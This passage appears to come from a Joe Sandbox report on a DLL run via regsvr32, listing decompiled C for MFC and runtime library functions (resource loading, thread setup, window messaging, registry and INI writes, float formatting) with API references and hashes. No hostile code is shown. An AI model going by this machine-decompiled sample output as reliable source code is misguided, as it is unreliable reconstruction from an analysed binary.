0x1000c88b
0x1000c88e
0x1000c890
0x1000c897
0x1000c89a
0x1000c89d
0x1000c8a4
0x1000c8bb
0x1000c8bb
0x1000c8c2
0x1000c8cd
0x1000c8cd
0x1000c8d1
0x1000c8d4
0x1000c8dc
0x1000c8de
0x1000c8ed
0x1000c8f1
0x1000c8e0
0x1000c8e0
0x1000c8e3
0x1000c8e7
0x1000c8e7
0x1000c8fa
0x1000c906
0x1000c906
0x1000c8fa
0x1000c90c
0x1000c911
0x1000c911
0x1000c91d

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
LockResource.KERNEL32(00000000), ref: 1000C8C7
FreeResource.KERNEL32(00000000), ref: 1000C911

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADB5, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E10017BC1(E10027E86, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x10029f54;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A0DB(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10017C60(_t51);
			}

0x1000adb5
0x1000adb5
0x1000adb5
0x1000adb5
0x1000adbc
0x1000adc1
0x1000adc3
0x1000adc6
0x1000adcd
0x1000add0
0x1000add3
0x1000add9
0x1000ade9
0x1000addb
0x1000adde
0x1000ade3
0x1000ade4
0x1000ade4
0x1000adf1
0x1000adf3
0x1000adf5
0x1000adf7
0x1000adf7
0x1000adf7
0x1000adfc
0x1000adfc
0x1000adff
0x1000ae06
0x00000000
0x00000000
0x1000ae08
0x1000ae11
0x1000ae1a
0x1000ae1d
0x1000ae20
0x1000ae23
0x1000ae26
0x1000ae29
0x1000ae2c
0x1000ae2f
0x1000ae32
0x1000ae38
0x1000ae3b
0x1000ae42
0x1000ae49
0x1000ae4c
0x1000ae52
0x1000ae58
0x1000ae5e
0x1000ae61
0x1000ae64
0x1000ae6a
0x1000ae70
0x1000ae73
0x1000ae76
0x1000ae87

APIs

__EH_prolog3.LIBCMT ref: 1000ADBC

Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869

__strdup.LIBCMT ref: 1000ADDE
GetCurrentThread.KERNEL32 ref: 1000AE0B
GetCurrentThreadId.KERNEL32 ref: 1000AE14

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1001170E, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001170E(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10010DEC(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10057298;
					E10017C83( &_v20, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
					_t29 = E10013965(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000CF71(_t29);
					}
					return E10017C60(_t24);
				}
			}

0x1001170e
0x1001170e
0x10011710
0x1001171d
0x1001171f
0x10011721
0x10011723
0x10011723
0x10011729
0x10011738
0x10011745
0x1001174a
0x10011751
0x10011755
0x10011763
0x10011770
0x10011775
0x1001177d
0x10011784
0x10011784
0x10011789
0x10011757
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011738
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011763

Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458

GetCapture.USER32 ref: 10011775
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 10011784

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660

Uniqueness

Uniqueness Score: -1.00%

Function 10013F17, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10016DF0( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10013ED1(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x10013f17
0x10013f1d
0x10013f24
0x10013f28
0x10013f2c
0x10013f33
0x10013f36
0x10013f76
0x10013f87
0x10013f38
0x10013f3e
0x10013f42
0x10013f50
0x10013f57
0x10013f59
0x10013f63
0x10013f63
0x10013f42
0x10013f9b

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
RegCloseKey.ADVAPI32(00000000), ref: 10013F59
_swprintf.LIBCMT ref: 10013F76
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000B244, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

0x1000b244
0x1000b246
0x1000b248
0x1000b24f
0x1000b284
0x1000b287
0x1000b25e
0x1000b25e
0x1000b263
0x1000b269
0x1000b27c
0x1000b2c7
0x1000b2c7
0x00000000
0x1000b2c7
0x1000b289
0x1000b28d
0x1000b28f
0x1000b290
0x1000b293
0x1000b299
0x1000b29c
0x1000b2b4
0x1000b2b4
0x1000b2ba
0x1000b2c2
0x00000000
0x1000b2c2
0x1000b254
0x1000b256
0x1000b259
0x1000b25c
0x00000000
0x00000000
0x00000000
0x1000b25c
0x1000b2d0

APIs

EnableMenuItem.USER32 ref: 1000B27C

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetFocus.USER32 ref: 1000B293
GetParent.USER32(?), ref: 1000B2A1
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1000B2B4

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001044A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001016F(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x1001044a
0x1001044a
0x10010452
0x10010458
0x100104bb
0x100104bb
0x100104bf
0x00000000
0x00000000
0x1001045c
0x10010460
0x1001048a
0x10010462
0x10010463
0x10010468
0x1001046a
0x1001046c
0x1001046f
0x10010472
0x10010475
0x10010478
0x10010479
0x10010479
0x1001046a
0x10010490
0x10010494
0x10010497
0x10010499
0x1001049b
0x100104ad
0x100104ad
0x1001049b
0x100104b5
0x100104b5
0x100104c4

APIs

GetTopWindow.USER32(00000000), ref: 10010458
GetTopWindow.USER32(00000000), ref: 10010497
GetWindow.USER32(00000000,00000002), ref: 100104B5

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100223DD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x100223dd
0x100223e0
0x100223e6
0x10022459
0x00000000
0x100223ed
0x100223ed
0x100223f0
0x1002240b
0x1002240e
0x1002242e
0x10022440
0x10022410
0x10022410
0x10022413
0x00000000
0x10022415
0x10022427
0x10022427
0x10022413
0x1002245e
0x10022462
0x100223f2
0x1002240a
0x1002240a
0x100223f0

APIs

__cftof_l.LIBCMT ref: 10022401

Part of subcall function 1002222C: __fltout2.LIBCMT ref: 10022256

__cftog_l.LIBCMT ref: 10022427
__cftoe_l.LIBCMT ref: 10022459

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE47, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000FB5C(_t13, _t14, _t18);
						}
						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x1000fe47
0x1000fe47
0x1000fe52
0x1000fe58
0x1000fe5e
0x1000fe62
0x1000fe92
0x1000fe95
0x1000feb2
0x1000feb2
0x1000feb4
0x1000feb6
0x00000000
0x00000000
0x1000fea0
0x1000fea5
0x1000fea7
0x1000feac
0x00000000
0x1000feac
0x00000000
0x1000fea7
0x1000fe64
0x1000fe69
0x1000fe7b
0x1000fe7f
0x1000fe80
0x00000000
0x1000fe82
0x1000fe89
0x1000fe8e
0x1000fe90
0x00000000
0x00000000
0x1000fe6b
0x1000fe72
0x1000fe79
0x00000000
0x00000000
0x1000fe79
0x1000fe69
0x1000febb
0x1000febb

APIs

GetDlgItem.USER32 ref: 1000FE52
GetTopWindow.USER32(00000000), ref: 1000FE65

Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC

GetTopWindow.USER32(?), ref: 1000FE95

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6BC, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002fae0);
				E1001984C(__ebx, __edi, __esi);
				_t31 = E1001BF79(__edx, __edi, _t35);
				_t15 =  *0x1005826c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A549(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10058170; // 0x4da1320
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10057d48;
								if(__eflags != 0) {
									_push(_t33);
									E10016380(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10058170; // 0x4da1320
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10058170; // 0x4da1320
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1001D757();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10017DA6(_t25, _t29, _t31, 0x20);
				}
				return E10019891(_t33);
			}

0x1001d6bc
0x1001d6bc
0x1001d6bc
0x1001d6bc
0x1001d6be
0x1001d6c3
0x1001d6cd
0x1001d6cf
0x1001d6d7
0x1001d6f8
0x1001d6fe
0x1001d702
0x1001d705
0x1001d708
0x1001d70e
0x1001d710
0x1001d712
0x1001d715
0x1001d71b
0x1001d71d
0x1001d71f
0x1001d725
0x1001d727
0x1001d728
0x1001d72d
0x1001d725
0x1001d71d
0x1001d72e
0x1001d733
0x1001d736
0x1001d73c
0x1001d740
0x1001d740
0x1001d746
0x1001d74d
